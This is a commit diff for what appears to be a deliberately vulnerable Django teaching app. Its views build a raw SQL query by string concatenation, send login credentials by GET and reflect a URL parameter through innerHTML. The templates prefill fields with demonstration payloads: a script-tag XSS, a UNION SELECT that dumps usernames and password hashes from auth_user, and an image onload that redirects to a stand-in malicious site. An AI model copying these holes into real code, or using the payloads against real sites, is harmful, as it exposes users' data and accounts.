1
0
Fork 0

Initial implementation

This commit is contained in:
John Ahlroos 2021-03-02 17:48:37 +02:00
parent a4a0eb4fff
commit fe3814b228
Signed by: john
GPG Key ID: 258D0F70DB84CD5D
7 changed files with 142 additions and 3 deletions

View File

View File

@ -0,0 +1,5 @@
from django.db import models
class Product(models.Model):
name = models.CharField(max_length=30)

View File

@ -27,6 +27,7 @@ DEBUG = True
ALLOWED_HOSTS = []
LOGIN_REDIRECT_URL = '/'
# Application definition
@ -37,6 +38,7 @@ INSTALLED_APPS = [
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'project1'
]
MIDDLEWARE = [
@ -51,10 +53,11 @@ MIDDLEWARE = [
ROOT_URLCONF = 'project1.urls'
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [

View File

@ -13,9 +13,19 @@ Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.contrib import admin, auth
from django.urls import path, include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
path('find_product', views.find_product),
path('login', views.login),
path('do_login', views.do_login),
path('logout', views.logout),
path('add_product', views.add_product),
path('import_products', views.import_products)
]

View File

@ -0,0 +1,53 @@
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from project1.models import Product
from django.contrib import auth
from django.contrib.auth.decorators import login_required
from django import forms
@login_required(login_url='/login')
def home(request):
return render(request, "index.html")
def login(request):
return render(request, 'login.html')
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/")
def do_login(request):
username = request.GET.get('username', '')
password = request.GET.get('password', '')
user = auth.authenticate(username=username, password=password)
if user is not None and user.is_active:
auth.login(request, user)
return HttpResponseRedirect("/")
else:
return HttpResponseRedirect(f"/login?message={username} not found.")
@login_required(login_url='/login')
def add_product(request):
name = request.POST.get('name', '')
product = Product.objects.create(name=name)
print('Added product ' + product.name)
return HttpResponse(content='Saved product ' + product.name)
def find_product(request):
search = request.GET.get('name', '')
print('Searching for ' + search)
products = Product.objects.raw(
"SELECT * FROM project1_Product where name like '%" + search + "%'")
return HttpResponse("<br/>".join(map(lambda p: p.name, products)))
@login_required(login_url='/login')
def import_products(request):
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
file = request.FILES['file']
return HttpResponseRedirect('/')
else:
return HttpResponse(content="Upload failed.")
class UploadFileForm(forms.Form):
file = forms.FileField()

View File

@ -0,0 +1,45 @@
<!DOCTYPE html>
<html>
<body>
<p>
<form method="POST" action="/add_product">
{% csrf_token %}
<label>Add product:</label><br>
<input id="add_product" name="name" type="text" />
<button type="submit">Submit</button>
<a href="#" onClick="xss_inject_attack()">XSS injection attack (steal cookies)</a>
</form>
</p>
<p>
<form method="GET" action="/find_product">
<label>Find Product by Name</label><br/>
<input id="find_product_by_name" name="name" type="text" />
<button type="submit ">Search</button>
<a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
</form>
</p>
<p>
<form method="POST" action="/import_products" enctype="multipart/form-data">
{% csrf_token %}
<label for="file">Import Products (XML):</label><br>
<input name="file" type="file" />
<button type="submit ">Submit</button>
</form>
</p>
<a href="/logout">Log out</a>
<script>
function xss_inject_attack() {
document.querySelector("#add_product").value = "<script>alert('I got your cookie, ha-haa!')</scr" + "ipt>";
}
function sql_inject_attack() {
document.querySelector("#find_product_by_name").value = "' AND false UNION ALL select id, username||' '||password||' '||first_name||''||last_name||' '||email from auth_user where username like '";
}
</script>
</body>
</html>

View File

@ -0,0 +1,23 @@
<h2>Log In</h2>
<form method="GET" action="do_login">
<label for="username">Username:</label>
<input id="username" type="text" name="username" /><a href="#" onclick="xss_inject()">XSS injection attack (site redirect)</a><br/>
<label for="password">Password:</label>
<input type="password" name="password" /><br/>
<button type="submit">Log In</button>
<div style="color:red" id=message></div>
<script>
function xss_inject() {
var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";
document.querySelector("#username").value = `<img src="${img}" onload="window.location.href='http://some.malicious.site.com';this.parentNode.removeChild(this);"/>`;
}
parameters = new URLSearchParams(window.location.search);
if (parameters.get('message')) {
message = decodeURIComponent(parameters.get('message'));
console.log(message);
document.querySelector("#message").innerHTML = message;
}
</script>
</form>